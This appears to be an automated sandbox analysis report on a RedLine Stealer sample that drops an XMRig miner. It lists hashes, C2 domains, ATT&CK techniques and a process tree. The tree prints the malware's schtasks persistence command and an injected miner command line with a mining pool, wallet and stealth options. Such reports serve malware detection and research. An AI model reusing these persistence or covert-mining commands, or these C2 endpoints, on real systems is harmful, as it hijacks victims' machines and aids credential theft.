Analysis

  • max time kernel
    151s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 14:34

General

  • Target

    a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe

  • Size

    234KB

  • MD5

    c32710820e0c9fccc1234fe6e7d7f1fb

  • SHA1

    80c54657f5571f2e8f20792c45d7848e1f1e4f78

  • SHA256

    a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351

  • SHA512

    3023dd2082a369edcc0cee0065f38b639de13351dfb6a32e497f52e99d7b22ce18e067076dc5bb996617f21c178579b5b15c157ad1572bd5c6d42fecf7809222

Malware Config

Extracted

Family

redline

Botnet

3

C2

deyrolorme.xyz:80

xariebelal.xyz:80

anihelardd.xyz:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe
    "C:\Users\Admin\AppData\Local\Temp\a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
      "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3132
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1112
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:3252
      • C:\Users\Admin\AppData\Roaming\services64.exe
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3744
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2056
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:3184
        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
          4⤵
          • Executes dropped EXE
          PID:2204
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=47z3fqW3wLPWJ4ACFetLRFTPAKWWqwp7fhF7gdaVDWfHYCiURua8iAr4mxbDH3aYV2AaqSTigrpDnKV9EM5Jjgs4TK1FnQq.living/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6L1cbBoqfaC06bAmgY02TjBZdfqiCoHvjS6kga2LQa1B" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:656
    • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet.exe
      "C:\Users\Admin\AppData\Local\Temp\JoBrowserSet.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3628
      • C:\Users\Admin\AppData\Roaming\4260884.exe
        "C:\Users\Admin\AppData\Roaming\4260884.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1264
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1264 -s 1920
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1468
      • C:\Users\Admin\AppData\Roaming\4679595.exe
        "C:\Users\Admin\AppData\Roaming\4679595.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2224
        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
          4⤵
          • Executes dropped EXE
          PID:3980
      • C:\Users\Admin\AppData\Roaming\2839185.exe
        "C:\Users\Admin\AppData\Roaming\2839185.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:728

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Collection

Data from Local System

2
T1005

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
    MD5

    70a7e04ae690a340005093741773d4c0

    SHA1

    feee658250fc2310d7f57d3924c77f5fb3e5f0b5

    SHA256

    720ff3adcf57946eaec54eb3e8fe9fc4a70e309ec530b4b732656361ac843a2c

    SHA512

    26ae461663258055230202183f30c0e31b0645feadf1c4d7ccd682bb4bb5d826e5de89f0794866e6e9c7365d64ad10665db45a39763117b3e80f8fd93e6d849a

  • C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
    MD5

    70a7e04ae690a340005093741773d4c0

    SHA1

    feee658250fc2310d7f57d3924c77f5fb3e5f0b5

    SHA256

    720ff3adcf57946eaec54eb3e8fe9fc4a70e309ec530b4b732656361ac843a2c

    SHA512

    26ae461663258055230202183f30c0e31b0645feadf1c4d7ccd682bb4bb5d826e5de89f0794866e6e9c7365d64ad10665db45a39763117b3e80f8fd93e6d849a

  • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet.exe
    MD5

    f500da99a480c93ffa943aa0df68385f

    SHA1

    ae1d68cda3396d12d9dda1060710e2d3e461f5a1

    SHA256

    3b1df5ffc18d2d046acb1d2a691b1b9f6a9bf31d5b0f26fc796f37dd6f786771

    SHA512

    76cf46b94cfc1e5c6a66b8622911df4f0ec06aea32a5f5c98a8f8df49b0af6c4c8a4570d156cb6c707c23ad61746de5a35c96c78f4cf9dc4ce6caaaf0e218f3c

  • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet.exe
    MD5

    f500da99a480c93ffa943aa0df68385f

    SHA1

    ae1d68cda3396d12d9dda1060710e2d3e461f5a1

    SHA256

    3b1df5ffc18d2d046acb1d2a691b1b9f6a9bf31d5b0f26fc796f37dd6f786771

    SHA512

    76cf46b94cfc1e5c6a66b8622911df4f0ec06aea32a5f5c98a8f8df49b0af6c4c8a4570d156cb6c707c23ad61746de5a35c96c78f4cf9dc4ce6caaaf0e218f3c

  • C:\Users\Admin\AppData\Roaming\2839185.exe
    MD5

    09d62b28d2630f7bc25a50d695707790

    SHA1

    e10c849c0d2b1cbaedb87b232660952809d85431

    SHA256

    acde34968315b6e34c222006ce337b853aa36f54b802cf210c5181d6eea474c9

    SHA512

    52a7c687681edf3265f57d61b4cec9427ab45f1cf1e970026efba2b86fbb842611b05b08163054dfe9d625ba14b85518bed9226602bece4b18bef39a925bed5a

  • C:\Users\Admin\AppData\Roaming\2839185.exe
    MD5

    09d62b28d2630f7bc25a50d695707790

    SHA1

    e10c849c0d2b1cbaedb87b232660952809d85431

    SHA256

    acde34968315b6e34c222006ce337b853aa36f54b802cf210c5181d6eea474c9

    SHA512

    52a7c687681edf3265f57d61b4cec9427ab45f1cf1e970026efba2b86fbb842611b05b08163054dfe9d625ba14b85518bed9226602bece4b18bef39a925bed5a

  • C:\Users\Admin\AppData\Roaming\4260884.exe
    MD5

    5292ec8e878617edfbf1700b1da8883c

    SHA1

    3877ef66899f568abc499914feb47ee36bb722f6

    SHA256

    0930d8576aea1ddb7f337ea24e5ad5a2a8734d46d96d6616e079103d6eca2e43

    SHA512

    4e9c564730fed94dbae1e0fd0afc2744dd3b860266e6457ed9d488d7ad3eefb522676c4333d84400032cbeaf7449d9e3e6fd03534f50c604ae69ff7c19eca17b

  • C:\Users\Admin\AppData\Roaming\4260884.exe
    MD5

    5292ec8e878617edfbf1700b1da8883c

    SHA1

    3877ef66899f568abc499914feb47ee36bb722f6

    SHA256

    0930d8576aea1ddb7f337ea24e5ad5a2a8734d46d96d6616e079103d6eca2e43

    SHA512

    4e9c564730fed94dbae1e0fd0afc2744dd3b860266e6457ed9d488d7ad3eefb522676c4333d84400032cbeaf7449d9e3e6fd03534f50c604ae69ff7c19eca17b

  • C:\Users\Admin\AppData\Roaming\4679595.exe
    MD5

    3598180fddc06dbd304b76627143b01d

    SHA1

    1d39b0dd8425359ed94e606cb04f9c5e49ed1899

    SHA256

    44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

    SHA512

    8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

  • C:\Users\Admin\AppData\Roaming\4679595.exe
    MD5

    3598180fddc06dbd304b76627143b01d

    SHA1

    1d39b0dd8425359ed94e606cb04f9c5e49ed1899

    SHA256

    44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

    SHA512

    8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    72cb849651c3d7cd22a2a29c30696c14

    SHA1

    372c795de4f318e819e35393581e045956eac59e

    SHA256

    658f47980ed8a26199fd49fe8dc850c9a326fcc4975478266a123e0cc5878b52

    SHA512

    df6a3147e72c67c62aaf0047c1a66e1c33a5e1b09c0190555624b54f2edccd19a6f573ceba0e283e89491e5aa30d596d2e1861962a4af086c93bf5cf3b1d3502

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    72cb849651c3d7cd22a2a29c30696c14

    SHA1

    372c795de4f318e819e35393581e045956eac59e

    SHA256

    658f47980ed8a26199fd49fe8dc850c9a326fcc4975478266a123e0cc5878b52

    SHA512

    df6a3147e72c67c62aaf0047c1a66e1c33a5e1b09c0190555624b54f2edccd19a6f573ceba0e283e89491e5aa30d596d2e1861962a4af086c93bf5cf3b1d3502

  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    MD5

    3598180fddc06dbd304b76627143b01d

    SHA1

    1d39b0dd8425359ed94e606cb04f9c5e49ed1899

    SHA256

    44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

    SHA512

    8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    MD5

    3598180fddc06dbd304b76627143b01d

    SHA1

    1d39b0dd8425359ed94e606cb04f9c5e49ed1899

    SHA256

    44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

    SHA512

    8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

  • C:\Users\Admin\AppData\Roaming\services64.exe
    MD5

    70a7e04ae690a340005093741773d4c0

    SHA1

    feee658250fc2310d7f57d3924c77f5fb3e5f0b5

    SHA256

    720ff3adcf57946eaec54eb3e8fe9fc4a70e309ec530b4b732656361ac843a2c

    SHA512

    26ae461663258055230202183f30c0e31b0645feadf1c4d7ccd682bb4bb5d826e5de89f0794866e6e9c7365d64ad10665db45a39763117b3e80f8fd93e6d849a

  • C:\Users\Admin\AppData\Roaming\services64.exe
    MD5

    70a7e04ae690a340005093741773d4c0

    SHA1

    feee658250fc2310d7f57d3924c77f5fb3e5f0b5

    SHA256

    720ff3adcf57946eaec54eb3e8fe9fc4a70e309ec530b4b732656361ac843a2c

    SHA512

    26ae461663258055230202183f30c0e31b0645feadf1c4d7ccd682bb4bb5d826e5de89f0794866e6e9c7365d64ad10665db45a39763117b3e80f8fd93e6d849a

  • memory/644-114-0x0000000000740000-0x0000000000741000-memory.dmp
    Filesize

    4KB

  • memory/656-196-0x00000001402F327C-mapping.dmp
  • memory/656-197-0x0000000000B70000-0x0000000000B90000-memory.dmp
    Filesize

    128KB

  • memory/656-202-0x00000000145A0000-0x00000000145C0000-memory.dmp
    Filesize

    128KB

  • memory/656-201-0x00000000140F0000-0x0000000014110000-memory.dmp
    Filesize

    128KB

  • memory/656-195-0x0000000140000000-0x0000000140763000-memory.dmp
    Filesize

    7.4MB

  • memory/656-198-0x0000000140000000-0x0000000140763000-memory.dmp
    Filesize

    7.4MB

  • memory/728-148-0x0000000005610000-0x0000000005642000-memory.dmp
    Filesize

    200KB

  • memory/728-168-0x00000000098B0000-0x00000000098B1000-memory.dmp
    Filesize

    4KB

  • memory/728-144-0x0000000000E30000-0x0000000000E31000-memory.dmp
    Filesize

    4KB

  • memory/728-172-0x0000000009720000-0x0000000009721000-memory.dmp
    Filesize

    4KB

  • memory/728-169-0x0000000009440000-0x0000000009441000-memory.dmp
    Filesize

    4KB

  • memory/728-173-0x0000000009DE0000-0x0000000009DE1000-memory.dmp
    Filesize

    4KB

  • memory/728-149-0x0000000008180000-0x0000000008181000-memory.dmp
    Filesize

    4KB

  • memory/728-141-0x0000000000000000-mapping.dmp
  • memory/728-167-0x00000000091B0000-0x00000000091B1000-memory.dmp
    Filesize

    4KB

  • memory/728-152-0x0000000007BF0000-0x0000000007BF1000-memory.dmp
    Filesize

    4KB

  • memory/728-153-0x0000000007C50000-0x0000000007C51000-memory.dmp
    Filesize

    4KB

  • memory/728-166-0x0000000007E40000-0x0000000007E41000-memory.dmp
    Filesize

    4KB

  • memory/728-162-0x0000000007C90000-0x0000000007C91000-memory.dmp
    Filesize

    4KB

  • memory/728-164-0x0000000005670000-0x0000000005671000-memory.dmp
    Filesize

    4KB

  • memory/1112-177-0x0000000000000000-mapping.dmp
  • memory/1264-133-0x0000000000050000-0x0000000000051000-memory.dmp
    Filesize

    4KB

  • memory/1264-138-0x0000000000760000-0x000000000078B000-memory.dmp
    Filesize

    172KB

  • memory/1264-150-0x000000001ACA0000-0x000000001ACA2000-memory.dmp
    Filesize

    8KB

  • memory/1264-130-0x0000000000000000-mapping.dmp
  • memory/2056-186-0x0000000000000000-mapping.dmp
  • memory/2204-194-0x0000000001220000-0x0000000001222000-memory.dmp
    Filesize

    8KB

  • memory/2204-190-0x0000000000A10000-0x0000000000A11000-memory.dmp
    Filesize

    4KB

  • memory/2204-187-0x0000000000000000-mapping.dmp
  • memory/2224-135-0x0000000000000000-mapping.dmp
  • memory/2224-139-0x00000000005C0000-0x00000000005C1000-memory.dmp
    Filesize

    4KB

  • memory/2224-146-0x0000000000DD0000-0x0000000000DD6000-memory.dmp
    Filesize

    24KB

  • memory/2224-147-0x0000000007770000-0x0000000007771000-memory.dmp
    Filesize

    4KB

  • memory/2224-151-0x0000000007310000-0x0000000007311000-memory.dmp
    Filesize

    4KB

  • memory/3132-174-0x0000000001150000-0x000000000115A000-memory.dmp
    Filesize

    40KB

  • memory/3132-175-0x0000000001300000-0x0000000001301000-memory.dmp
    Filesize

    4KB

  • memory/3132-176-0x0000000001470000-0x0000000001472000-memory.dmp
    Filesize

    8KB

  • memory/3132-119-0x0000000000940000-0x0000000000941000-memory.dmp
    Filesize

    4KB

  • memory/3132-116-0x0000000000000000-mapping.dmp
  • memory/3184-192-0x0000000000000000-mapping.dmp
  • memory/3252-178-0x0000000000000000-mapping.dmp
  • memory/3628-129-0x000000001B370000-0x000000001B372000-memory.dmp
    Filesize

    8KB

  • memory/3628-128-0x0000000000DB0000-0x0000000000DB1000-memory.dmp
    Filesize

    4KB

  • memory/3628-121-0x0000000000000000-mapping.dmp
  • memory/3628-127-0x0000000000D90000-0x0000000000DAE000-memory.dmp
    Filesize

    120KB

  • memory/3628-126-0x0000000000D70000-0x0000000000D71000-memory.dmp
    Filesize

    4KB

  • memory/3628-124-0x0000000000640000-0x0000000000641000-memory.dmp
    Filesize

    4KB

  • memory/3744-179-0x0000000000000000-mapping.dmp
  • memory/3744-193-0x000000001CAA0000-0x000000001CAA2000-memory.dmp
    Filesize

    8KB

  • memory/3980-154-0x0000000000000000-mapping.dmp
  • memory/3980-163-0x0000000008100000-0x0000000008101000-memory.dmp
    Filesize

    4KB

  • memory/3980-165-0x0000000005880000-0x0000000005881000-memory.dmp
    Filesize

    4KB